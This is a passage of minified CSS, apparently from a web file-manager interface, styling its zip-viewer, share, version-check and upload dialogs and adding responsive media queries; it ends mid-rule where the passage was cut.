.header .bg{background:url("../../../images/common/banner/fly.png") 100px -300px;width:100%;height:100%;position:absolute;}.zip-view-dialog .zip-view-content .header .icon{width:56px;height:56px;position:absolute;left:20px;top:20px;}.zip-view-dialog .zip-view-content .header .name,.zip-view-dialog .zip-view-content .header .desc{position:absolute;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;width:80%;}.zip-view-dialog .zip-view-content .header .name{margin:22px 0 0 90px;font-size:18px;font-weight:800;}.zip-view-dialog .zip-view-content .header .desc{margin:50px 0 0 90px;}.zip-view-dialog .zip-view-content .zip-header-title{height:23px;line-height:23px;border-bottom:1px solid #ddd;border-top:1px solid #ddd;background:#f6f6f6 url("../../../images/common/bg.gif") 0 -30px;}.zip-view-dialog .zip-view-content .zip-header-title .item{float:left;}.zip-view-dialog .zip-view-content .zip-header-title .item span{display:block;border-right:1px solid #ddd;padding-left:10px;cursor:default;}.zip-view-dialog .zip-view-content .zip-header-title .name{width:60%;}.zip-view-dialog .zip-view-content .zip-header-title .size{width:10%;}.zip-view-dialog .zip-view-content .zip-header-title .mtime{width:30%;}.zip-view-dialog .zip-view-content .zip-header-title .item.mtime span{border-right:none;}.zip-view-dialog .zip-view-content .ztree{padding:0px;position:absolute;top:115px;left:0;right:0px;bottom:0;overflow:auto;}.zip-view-dialog .zip-view-content .ztree li,.zip-view-dialog .zip-view-content .ztree li ul{width:100%;}.zip-view-dialog .zip-view-content .ztree li a{position:relative;padding-left:0;color:#333;text-shadow:none;}.zip-view-dialog .zip-view-content .ztree li a:hover{transition:none;}.zip-view-dialog .zip-view-content .ztree li a.odd{background:#f1f7ff;}.zip-view-dialog .zip-view-content .ztree li a:hover,.zip-view-dialog .zip-view-content .ztree li a.odd:hover{background:#fdeec3;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode,.zip-view-dialog .zip-view-content .ztree li a.odd.curSelectedNode{background:#63acff;color:#fff;}.zip-view-dialog .zip-view-content .ztree li a .name{width:45%;overflow:hidden;position:absolute;word-break:break-all;text-overflow:ellipsis;}.zip-view-dialog .zip-view-content .ztree li a .time{width:27%;opacity:0.8;font-size:12px;position:absolute;left:72%;}.zip-view-dialog .zip-view-content .ztree li a .size{width:10%;opacity:0.8;font-size:12px;position:absolute;left:62%;}.zip-view-dialog .zip-view-content .ztree li a .menu-item-parent{display:none;position:absolute;right:0px;top:0;text-align:center;width:25px;height:24px;background:#fff;background:rgba(50,50,50,0.1);color:#666;}.zip-view-dialog .zip-view-content .ztree li a:hover .menu-item-parent{display:block;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode .menu-item-parent{display:block;color:#fff;}.support-space-not .share-dialog .content-box .content-info{padding:30px 20px 30px 20px;}.support-space-not .system-content .right-frame .group-title .group-size{display:none !important;}.support-space-not .size-max-set,.support-space-not .user-setting-more-btn,.support-space-not .user-setting-more{display:none;}.support-space-not .user-list .space,.support-space-not .share-view-info,.support-space-not .user-space-info{display:none;}.support-space-not .frame-main .user-space-info{display:none;}.support-space-not .frame-main .frame-left .group-space-use{display:none;}.support-space-not .frame-main .frame-left #folder-list-tree{bottom:70px;}.dropdown-menu.menu-topbar-user{right:6px;}.version-vip{height:26px;line-height:26px;padding:0;opacity:0.7;filter:alpha(opacity=70);padding-left:25px;cursor:pointer;font-size:12px;display:block;color:#eee;background:#999;}.version-vip#version_vip_1{color:#bdeaff;background:#03a9f4;}.version-vip#version_vip_2{color:#ea9df7;background:#9c27b0;}.version-vip#version_vip_3,.version-vip#version_vip_4,.version-vip#version_vip_5,.version-vip#version_vip_6{color:#fff;background:#ffc107;}.version-vip:hover{opacity:0.9;filter:alpha(opacity=90);text-decoration:none;}.version-license{width:250px;height:250px;overflow:hidden;position:absolute;z-index:9999;pointer-events:none;top:30px;left:0px;}.version-license a.line{position:absolute;pointer-events:all;width:300px;height:60px;line-height:60px;left:-70px;top:40px;font-size:20px;background:#4CAF50;text-decoration:none;-webkit-transform:rotate(-45deg);-moz-transform:rotate(-45deg);transform:rotate(-45deg);-webkit-transition:all 0.2;-moz-transition:all 0.2;-o-transition:all 0.2;-ms-transition:all 0.2;transition:all 0.2;text-align:center;color:#fff;opacity:0.9;filter:alpha(opacity=90);}.version-license a.line:hover{opacity:0.7;filter:alpha(opacity=70);}.path-select-input{width:550px;padding:7px;background:rgba(255,255,255,0.3);border:1px solid rgba(100,100,100,0.3);color:#000;}.aui-state-lock .aui-min{display:none;}.dialog-copyright{width:400px !important;}.dialog-copyright,.share-dialog,.check-version-dialog{min-width:400px;}.dialog-copyright.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer{overflow:inherit;box-shadow:0 0px 60px rgba(0,0,0,0.4);border-radius:5px;border:none;}.dialog-copyright.dialog-simple .aui-outer,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in,.share-dialog.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in,.check-version-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-main,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.share-dialog.dialog-simple .aui-outer .aui-main,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.check-version-dialog.dialog-simple .aui-outer .aui-main,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-header,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.share-dialog.dialog-simple .aui-outer .aui-header,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.check-version-dialog.dialog-simple .aui-outer .aui-header,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header{border:none;}.dialog-copyright.dialog-simple .aui-header,.share-dialog.dialog-simple .aui-header,.check-version-dialog.dialog-simple .aui-header{background:transparent;opacity:1.0;filter:alpha(opacity=100);border:none;}.dialog-copyright.dialog-simple .aui-nw,.dialog-copyright.dialog-simple .aui-n,.dialog-copyright.dialog-simple .aui-ne,.dialog-copyright.dialog-simple .aui-w,.dialog-copyright.dialog-simple .aui-e,.dialog-copyright.dialog-simple .aui-sw,.dialog-copyright.dialog-simple .aui-s,.dialog-copyright.dialog-simple .aui-se,.share-dialog.dialog-simple .aui-nw,.share-dialog.dialog-simple .aui-n,.share-dialog.dialog-simple .aui-ne,.share-dialog.dialog-simple .aui-w,.share-dialog.dialog-simple .aui-e,.share-dialog.dialog-simple .aui-sw,.share-dialog.dialog-simple .aui-s,.share-dialog.dialog-simple .aui-se,.check-version-dialog.dialog-simple .aui-nw,.check-version-dialog.dialog-simple .aui-n,.check-version-dialog.dialog-simple .aui-ne,.check-version-dialog.dialog-simple .aui-w,.check-version-dialog.dialog-simple .aui-e,.check-version-dialog.dialog-simple .aui-sw,.check-version-dialog.dialog-simple .aui-s,.check-version-dialog.dialog-simple .aui-se{height:0px;width:0px;background:none;}.dialog-copyright.dialog-simple .aui-inner,.share-dialog.dialog-simple .aui-inner,.check-version-dialog.dialog-simple .aui-inner{border:none;background:none;}.dialog-copyright.dialog-simple .aui-title,.share-dialog.dialog-simple .aui-title,.check-version-dialog.dialog-simple .aui-title{opacity:0.01;filter:alpha(opacity=1);top:0px;position:absolute;width:100%;height:100%;z-index:5;}.dialog-copyright.dialog-simple .aui-min,.dialog-copyright.dialog-simple .aui-max,.share-dialog.dialog-simple .aui-min,.share-dialog.dialog-simple .aui-max,.check-version-dialog.dialog-simple .aui-min,.check-version-dialog.dialog-simple .aui-max{display:none;}.dialog-copyright.dialog-simple .aui-title-bar,.share-dialog.dialog-simple .aui-title-bar,.check-version-dialog.dialog-simple .aui-title-bar{bottom:0px;overflow:hidden;height:100px;position:absolute;margin-top:-120px;top:120px;margin-left:0px;border-radius:4px;}.dialog-copyright.dialog-simple .aui-close,.share-dialog.dialog-simple .aui-close,.check-version-dialog.dialog-simple .aui-close{opacity:0.6;filter:alpha(opacity=60);background:rgba(0,0,0,0.5);width:100px;height:100px;top:-50px;right:-50px;border-radius:50px;text-align:left;font-size:20px;z-index:100;padding:0;}.dialog-copyright.dialog-simple .aui-close:hover,.share-dialog.dialog-simple .aui-close:hover,.check-version-dialog.dialog-simple .aui-close:hover{opacity:0.6;filter:alpha(opacity=60);}.dialog-copyright.dialog-simple .aui-close:active,.share-dialog.dialog-simple .aui-close:active,.check-version-dialog.dialog-simple .aui-close:active{opacity:1.0;filter:alpha(opacity=100);}.dialog-copyright.dialog-simple .aui-close::before,.share-dialog.dialog-simple .aui-close::before,.check-version-dialog.dialog-simple .aui-close::before{padding-left:22px;line-height:140px;}.dialog-copyright .aui-footer,.share-dialog .aui-footer,.check-version-dialog .aui-footer{display:none;}.check-version-dialog .update-box{margin-top:0px;}.share-dialog .content-box .content-info .input-line .open-window,.pathinfo .input-group-btn .open-window{margin-right:-1px;border-radius:0px;}.dialog-copyright .dialog-copyright-content,.check-version-dialog .aui-content{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;width:auto;border-radius:6px;width:400px;-webkit-box-shadow:0px 10px 60px rgba(0,0,0,0.4);-moz-box-shadow:0px 10px 60px rgba(0,0,0,0.4);box-shadow:0px 10px 60px rgba(0,0,0,0.4);border:1px solid #ccc \9;padding-bottom:30px;background:#fff;background:rgba(255,255,255,0.9);}.dialog-copyright .dialog-copyright-content .title,.check-version-dialog .aui-content .title{width:100%;background:#6699cc url("../../../images/common/login.png");height:150px;padding-top:0px;border-top-left-radius:5px;border-top-right-radius:5px;}.dialog-copyright .dialog-copyright-content .title .logo,.check-version-dialog .aui-content .title .logo{text-align:center;font-size:35px;width:100%;padding-top:40px;color:#aaddff;-webkit-box-reflect:below -13px -webkit-gradient(linear,left top,left bottom,from(transparent),to(rgba(255,255,255,0.2)));background-image:-webkit-linear-gradient(92deg,#FFFFFF,#14A1FF);-webkit-background-clip:text;-webkit-text-fill-color:transparent;-webkit-animation:hue 6s 100 linear;}.dialog-copyright .dialog-copyright-content .title .logo i,.check-version-dialog .aui-content .title .logo i{color:#aaddff;font-weight:400;margin-right:10px;}.dialog-copyright .dialog-copyright-content .title .info,.check-version-dialog .aui-content .title .info{text-align:right;font-size:1.15em;color:#aaddff;padding-right:14px;padding-top:30px;}.dialog-copyright .dialog-copyright-content .content,.check-version-dialog .aui-content .content{padding:20px;}.dialog-copyright .dialog-copyright-content .content p,.check-version-dialog .aui-content .content p{text-indent:2em;color:#333;margin-bottom:30px;}.dialog-copyright .dialog-copyright-content .content a,.check-version-dialog .aui-content .content a{padding-right:5px;}.dialog-copyright .dialog-copyright-content .content div,.check-version-dialog .aui-content .content div{text-align:center;padding-bottom:5px;}.check-version-dialog.dialog-simple .aui-title-bar{margin-top:-120px;}.share-dialog .content-box{-webkit-box-shadow:0 5px 30px rgba(0,0,0,0.5);-moz-box-shadow:0 5px 30px rgba(0,0,0,0.5);box-shadow:0 5px 30px rgba(0,0,0,0.5);border-radius:5px;background:#fff;border:1px solid #ccc \9;width:auto;}.share-dialog .content-box .title{width:100%;color:#fff;height:100px;border-radius:5px 5px 0 0;background:#6699cc url('../../../images/common/login.png');}.share-dialog .content-box .titleinfo{text-align:center;font-size:35px;height:60px;overflow:hidden;line-height:80px;}.share-dialog .content-box .titleinfo i{color:#dff;font-size:30px;padding-right:10px;}.share-dialog .content-box .share-view-info{width:200px;margin:0 auto;margin-top:0px;padding:1px 5px;text-align:center;border-radius:17px;background:#117eaf;background:rgba(0,0,0,0.2);opacity:0.8;filter:alpha(opacity=80);}.share-dialog .content-box .content-info{padding:10px;padding-left:20px;}.share-dialog .content-box .content-info .input-line{margin:6px 0 8px 0;position:relative;}.share-dialog .content-box .content-info .input-line .input-title{display:block;width:80px;padding-top:4px;float:left;height:30px;padding-right:10px;text-align:right;}.share-dialog .content-box .content-info .input-line input[type="text"]{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:32px;line-height:30px;padding:0px 5px;width:150px;margin-right:10px;float:left;border-radius:3px;}.share-dialog .content-box .content-info .input-line input[type="text"]:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.share-dialog .content-box .content-info .input-line label{margin-top:8px;margin-right:10px;}.share-dialog .content-box .content-info .input-line label input{margin:0 5px 5px 0;}.share-dialog .content-box .content-info .input-line .desc{font-size:1em;color:#bbb;font-style:normal;padding-left:0px;}.share-dialog .content-box .content-info .input-line .share-name{width:215px;margin-right:10px;}.share-dialog .content-box .content-info .input-line .share-url{margin-right:0;border-radius:3px 0 0 3px;width:167px !important;height:33px;}.share-dialog .content-box .content-info .input-line .share-more{line-height:33px;}.share-dialog .content-box .content-info .input-line .input-group-btn{float:left;}.share-dialog .content-box .content-info .input-line .dropdown-toggle{margin-left:-5px;border-radius:0 3px 3px 0;}.share-dialog .content-box .content-info .input-line .open-window{margin-left:-12px;}.share-dialog .content-box .content-info .input-line .share-copy{width:60px;border-radius:0px;margin-left:-7px;}.share-dialog .content-box .content-info .input-line.select-path input[type="text"]{width:155px;}.share-dialog .content-box .content-info .input-line.select-path a.select-btn{margin-left:-14px;padding:5px 8px 5px;font-size:15px;border-top-left-radius:0px;border-bottom-left-radius:0px;}.share-dialog .content-box .content-info .share-others{margin:-8px 0 -8px 0;}.share-dialog .content-box .share-action{border-top:1px solid #eee;background:#f8f8f8;height:60px;border-radius:0 0 4px 4px;}.share-dialog .content-box .share-action button{float:right;margin:10px 20px 10px 0px;outline:0;}.share-dialog .content-box .share-action .share-remove-button,.share-dialog .content-box .share-action .remove-button{float:right;margin-top:18px;color:#888;margin-right:20px;font-size:14px;}.share-dialog .content-box .share-action .share-remove-button:hover,.share-dialog .content-box .share-action .remove-button:hover{color:#f30;}.file-list-icon .file{position:relative;}.file-list-icon .file .download{position:absolute;bottom:4px;margin-left:45px;opacity:0.5;filter:alpha(opacity=50);}.file-list-icon .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:30px;line-height:30px;width:30px;color:#aaa;}.file-list-list .file{position:relative;}.file-list-list .file .download{position:absolute;bottom:-2px;margin-left:45px;left:180px;z-index:99;opacity:0.5;filter:alpha(opacity=50);}.file-list-list .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:28px;line-height:28px;width:28px;color:#aaa;}.pathSelectApi .aui-footer .aui-buttons{padding:15px;}.pathSelectApi .aui-footer .label{position:absolute;right:175px;margin-top:6px;opacity:0.7;filter:alpha(opacity=70);}body div.file-continer .file.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-writeable{opacity:0.7;filter:alpha(opacity=70);color:#08c !important;}body div.file-continer .file.file-not-readable,body div.file-continer .file.file-not-readable.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-readable,body .frame-main .frame-left .ztree li a.file-not-readable.file-not-writeable{opacity:0.4;filter:alpha(opacity=40);color:#a00 !important;}.url-link input{border:1px solid #ddd;background:#fff;line-height:30px;height:30px;width:300px;margin-bottom:15px;padding:0 5px;}.aui-content .ajaxError{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;color:#f60;position:absolute;left:0px;right:0px;bottom:0px;top:40px;overflow:auto;padding:10px;}.pathinfo{font-size:1em;width:350px;min-height:300px;padding:20px 0 10px 0;color:#446;}.pathinfo .line{width:95%;margin:8px auto 8px auto;height:0px;border-bottom:1px solid #eee;}.pathinfo .download-url{padding:0px 5px;width:140px;line-height:32px;height:32px;}.pathinfo .p{margin-bottom:2px;}.pathinfo .p .icon{width:40px;height:40px;float:left;border:1px solid #f6f6f6;margin-left:10px;}.pathinfo .p input.info-chmod{padding:0px 10px;width:55px;color:#999;margin-right:10px;display:inline-block;height:25px;line-height:25px;}.pathinfo .p .title{width:80px;float:left;color:#888;text-align:right;}.pathinfo .p .content{float:left;width:240px;word-break:break-all;color:#666;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;font-size:1em;margin-left:15px;}.pathinfo .p .content.file-md5-loading{background:url("../../../images/common/loading.gif") 18px 5px no-repeat;}.pathinfo input{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;line-height:28px;padding:2px 5px;width:150px;float:left;height:28px;border-radius:3px;}.pathinfo input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.pathinfo .download-url{margin-right:0;border-radius:3px 0 0 3px;}.file-drag-upload .aui-content{overflow-y:scroll;}.fileupload{padding-left:25px;}.fileupload span.status{padding-left:10px;font-size:10px;color:#f96;}.movie-player-dialog{overflow:hidden;}.flash-player{width:100%;height:100%;}.wmp-player{width:0%;height:0%;}.movie-player-dialog .aui-content{background:#000;}.dialog-path-remove .aui-content{word-wrap:break-word;width:auto;}.server-dwonload-textarea textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.server-dwonload-textarea textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.file-upload-box{height:385px;padding:5px;min-width:365px;overflow:hidden;}.file-upload-box .topbar-nav{border-bottom:1px solid #ddd;margin-top:6px;}.file-upload-box .menu{display:block;text-decoration:none;float:left;padding:0px 15px;height:26px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#eeeeee');background-image:-webkit-linear-gradient(top,#fff,#eee);background-image:-moz-linear-gradient(top,#fff,#eee);background-image:-o-linear-gradient(top,#fff,#eee);background-image:-ms-linear-gradient(top,#fff,#eee);background-image:linear-gradient(top,#fff,#eee);-pie-background:linear-gradient(to top,#fff,#eee);font-size:1em;border:1px solid #ccc;text-align:center;line-height:24px;margin-right:5px;margin-bottom:-1px;color:#444;border-radius:4px 4px 0 0;}.file-upload-box .menu.this{background:#fff;border-bottom:1px solid #fff;}.file-upload-box .menu:hover{background:#fff;}.file-upload-box .upload-box{margin-top:10px;}.file-upload-box .download-btn-group{margin-left:-10px;margin-top:-2px;margin-top:-4px \9;}.file-upload-box .download-btn-group .download-start{border-radius:0px;}.file-upload-box .upload-box-tips .btn.btn-default{border-radius:3px;color:#555;}.file-upload-box .upload-box-tips .btn-group>.btn:last-child:not(:first-child),.file-upload-box .upload-box-tips .btn-group>.dropdown-toggle:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0;}.file-upload-box div a.left{margin-left:10px;}.file-upload-box div a.right{position:absolute;right:5px;}.file-upload-box span.info{font-size:1em;font-style:italic;padding:0px 0 5px 10px;}.file-upload-box i{font-size:1em;color:#aaa;padding-left:10px;}.file-upload-box .list{margin:10px 15px 10px 0;}.file-upload-box .list input{margin-left:10px;width:190px;height:22px;line-height:24px;padding:0px 3px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.file-upload-box .list input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.file-upload-box .submit input{float:right;padding:4px 20px;background:#ddd;border:none;margin-right:36px;margin-top:10px;}.file-upload-box .submit input:hover{background:#bbb;}.file-upload-box .submit input:active{background:#444;color:#fff;}.file-upload-box .uploader-content{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;background:url("../../../images/common/drop_upload.png") no-repeat center;}.file-upload-box #downloader{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;}.file-upload-box .webuploader-container{position:relative;}.file-upload-box .webuploader-element-invisible{position:absolute !important;clip:rect(1px 1px 1px 1px);clip:rect(1px,1px,1px,1px);}.file-upload-box .webuploader-pick{position:relative;display:inline-block;color:#fff;text-align:center;height:27px;line-height:27px;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);cursor:pointer;padding:0px 15px;}.file-upload-box .webuploader-pick-hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .upload-cert{width:24px;background:#def;height:100%;float:left;cursor:pointer;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);height:27px;line-height:27px;position:relative;z-index:10;padding:0;border:none;margin-left:-5px;border-left:1px solid rgba(0,0,0,0.1);border-top-right-radius:3px;border-bottom-right-radius:3px;}.file-upload-box .upload-cert .caret{margin-top:-2px;margin-left:-1px;border-top:4px solid #fff;}.file-upload-box .upload-cert-box .dropdown-menu{right:inherit;top:inherit;margin-top:30px;}.file-upload-box .upload-cert-box .dropdown-menu:before{right:inherit;left:10px;}.file-upload-box .upload-cert-box .dropdown-menu:after{right:inherit;left:11px;}.file-upload-box .upload-cert-box.open.upload-cert,.file-upload-box .upload-cert-box .upload-cert:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .webuploader-pick-disable{opacity:0.6;filter:alpha(opacity=60);pointer-events:none;}.file-upload-box .btns{margin-bottom:10px;font-size:1em;height:28px;}.file-upload-box .btns .tips{float:right;line-height:30px;}.file-upload-box .btns #picker{float:left;}.file-upload-box .upload-box-tips{line-height:34px;color:#888;position:absolute;right:10px;}.file-upload-box .upload-box-config{box-shadow:inset 0px 1px 6px rgba(0,0,0,0.3);border-radius:2px;margin-bottom:10px;padding:4px;}.file-upload-box .upload-box-config .upload-check-box{margin-left:10px;}.file-upload-box .upload-box-config label{margin-left:15px;}.file-upload-box .upload-box-config label input{margin-right:5px;}.file-upload-box .uploader-list .item,.file-upload-box .download-list .item{padding:0px;height:35px;overflow:hidden;position:relative;border-bottom:1px solid #ccc;background:#fefefe;}.file-upload-box .uploader-list .item .info,.file-upload-box .download-list .item .info{color:#224;line-height:35px;padding:0 5px;z-index:100;position:relative;font-size:1em;}.file-upload-box .uploader-list .item .info span,.file-upload-box .uploader-list .item .info a,.file-upload-box .download-list .item .info span,.file-upload-box .download-list .item .info a{float:left;height:30px;display:block;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}.file-upload-box .uploader-list .item .info .title,.file-upload-box .download-list .item .info .title{color:#3A87AD;width:160px;width:50%;font-weight:800;}.file-upload-box .uploader-list .item .info .size,.file-upload-box .download-list .item .info .size{width:45px;text-align:center;color:#3A87AD;font-size:12px;}.file-upload-box .uploader-list .item .info .state,.file-upload-box .download-list .item .info .state{width:100px;width:27%;text-align:right;font-size:12px;}.file-upload-box .uploader-list .item .info .font-icon,.file-upload-box .download-list .item .info .font-icon{margin-left:12px;font-size:20px;width:20px;line-height:35px;cursor:pointer;color:#bbb;}.file-upload-box .uploader-list .item .info .font-icon:hover,.file-upload-box .download-list .item .info .font-icon:hover{text-decoration:none;color:#f60;}.file-upload-box .uploader-list .item .info .icon-ok,.file-upload-box .download-list .item .info .icon-ok{color:#40AA53;}.file-upload-box .uploader-list .item .info .error,.file-upload-box .download-list .item .info .error{color:#f30;}.file-upload-box .uploader-list .item.success,.file-upload-box .download-list .item.success{background:#eaf8ff;}.file-upload-box .uploader-list .item.error,.file-upload-box .download-list .item.error{background:#ffe8e6;}.file-upload-box .uploader-list .item .progress,.file-upload-box .download-list .item .progress{height:38px;margin:0px;width:100%;border-radius:0;box-shadow:none;position:absolute;top:0;}.file-upload-box .uploader-list .item .progress-bar,.file-upload-box .download-list .item .progress-bar{background-color:#adf;background-image:linear-gradient(45deg,rgba(255,255,255,0.35) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.35) 50%,rgba(255,255,255,0.35) 75%,transparent 75%,transparent);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ddeeff',endColorstr='#88ccff',GradientType=1);BACKGROUND-REPEAT:repeat-x;}.file-upload-box .uploader-list .success:hover,.file-upload-box .download-list .success:hover{cursor:pointer;background:#def;border-bottom:1px solid #3A87AD;}@media screen and (-ms-high-contrast:active),(-ms-high-contrast:none){.btn{ padding:5px 14px;} input[type='checkbox'].kui-checkbox-ios.size-big + em{ height:27px;} #body .system-content .right-frame .user-list table tr td.select input{ position:relative;top:4px;} #body table tr input[type='text']{ line-height:22px;} .do-search-box .search-header .btn-right{ margin:-9px 0 0 -2px;height:23px;} .appbox .appline.icon .open{ margin-top:-2px;} .appbox .appline label{ position:relative;top:-4px;} #body .main .group-editor .tag input{ position:relative;top:-5px;} .share-dialog .aui-border{ overflow:auto;} .share-dialog .content-box .content-info .input-line.select-path a.select-btn{ padding:3px 8px 4px;} .kui-radio + span, .kui-checkbox + span{ position:relative;top:-6px;} .kui-radio.size-small + span, .kui-checkbox.size-small + span{ position:relative;top:-4px;} .kui-radio.size-smallx + span, .kui-checkbox.size-smallx + span{ position:relative;top:-2px;}}@media (max-width:743px){html #body .app-menu-left, html body .app-menu-left{ width:50px;min-width:50px;} html #body .app-menu-left .search{ opacity:0.001;} html #body .menu-left .setting a.selected, html body .menu-left .setting a.selected{ padding-left:0px;margin-left:-5px;} html #body .main.app-content, html body .main.app-content{ left:50px;} html #body .main.app-content .app-list, html body .main.app-content .app-list{ justify-content:space-around;} html .form-box .form-row .setting-title{ text-align:left;} html .form-box .form-row.form-userSelect .setting-content{ padding:10px 5%;} html .form-box .form-row .setting-content{ width:90%;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{ width:100%;height:40px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{ left:0px;top:80px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{ float:left;} html #body.plugin-page .app-menu-left .line, html body.plugin-page .app-menu-left .line{ padding:4px 0;} html body #body .menu-left, html body #body .app-menu-left{ width:50px;min-width:50px;} html body #body .menu-left h1, html body #body .app-menu-left h1{ font-size:14px;font-weight:800 !important;padding:10px 0px 10px 0px;text-align:center;} html body #body .menu-left .font-icon, html body #body .app-menu-left .font-icon{ padding-right:30px;} html #body .setting-tools-right, html body .setting-tools-right{ top:0;} html #body .main .nav a, html body .main .nav a{ padding:5px 10px;} html #body .main .nav, html body .main .nav{ margin-right:0px;} html #body .setting-tab, html body .setting-tab, html #body .system-content, html body .system-content{ margin-right:10px;} html #body .main, html body .main{ left:50px;width:auto;margin-right:10px;} html .form-box .form-row .desc, html .form-box .form-row .setting-content i{ display:block;} html #body .setting-tab .form-row, html body .setting-tab .form-row, html #body .system-content .form-row, html body .system-content .form-row{ background:#fafafa;border-radius:4px;padding:0 5px;} html .form-box .form-row .setting-title{ height:20px;line-height:20px;} html .form-box .form-row{ padding:0;} html .form-box .form-row input[type='text'], html .form-box .form-row input[type='password'], html .form-box .form-row input[type='number']{ width:180px;} html .form-box .form-row #wallpage-url{ width:150px !important;} html #body .main .section .content .box p, html body .main .section .content .box p{ text-indent:10px;} html #body .system-content.setting-member{ width:800px;} html body.setting-page .select-user-group .right-content, html body.setting-page .select-user-group .left-content{ width:170px;} html .topbar .content .top-right ul.dropdown-menu.topbar-language{ width:235px;max-height:800px;} html #body .main .section .box, html body .main .section .box{ margin-right:10px;} html #body .main .section .box .list, html body .main .section .box .list{ width:95px;height:95px;} html #body .main .section .box .list .ico, html body .main .section .box .list .ico{ width:75px;height:60px;} html #body .panel, html body .panel{ margin-right:0px;} html #body .main.app-content .app-list .app-li, html body .main.app-content 